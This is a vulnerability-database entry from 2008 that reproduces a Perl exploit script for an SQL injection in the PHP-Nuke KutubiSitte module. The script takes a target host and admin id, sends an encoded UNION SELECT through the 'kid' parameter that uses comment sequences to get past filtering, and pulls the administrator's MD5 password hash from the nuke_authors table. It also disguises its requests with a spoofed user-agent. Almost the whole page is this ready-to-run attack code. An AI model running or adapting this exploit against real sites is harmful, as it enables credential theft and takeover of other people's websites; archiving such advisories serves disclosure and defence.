Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19355
HistoryMar 09, 2008 - 12:00 a.m.

PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding

2008-03-0900:00:00
vulners.com
267

#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
| PHP-NUKE KutubiSitte [kid] => SQL Injection |
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
#######################################################

Bug by Lovebug Exploit-Code by r080cy90r from RBT-4

#######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| USAGE: |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| EXAMPLE: |#:
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#

");
}
sub problem{
print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
exit();
}
sub exploitation{

$conn = LWP::UserAgent -&gt; new;
$conn-&gt;agent&#40;&#39;Checkbot/0.4 &#39;&#41;;
$query_pwd =

$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
$return_pwd = $conn->get($query_pwd) || problem();
$return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
}

getopts(":h:p:U:",\%args);
$host = $args{h} if (defined $args{h});
$path = $args{p} if (defined $args{p});
$user_id= $args{U}if (defined $args{U});

 if &#40;!defined $args{h} || !defined $args{p} || !defined $args{U}&#41;{
    usg&#40;&#41;;
 }
 else{
    exploitation&#40;&#41;;
 }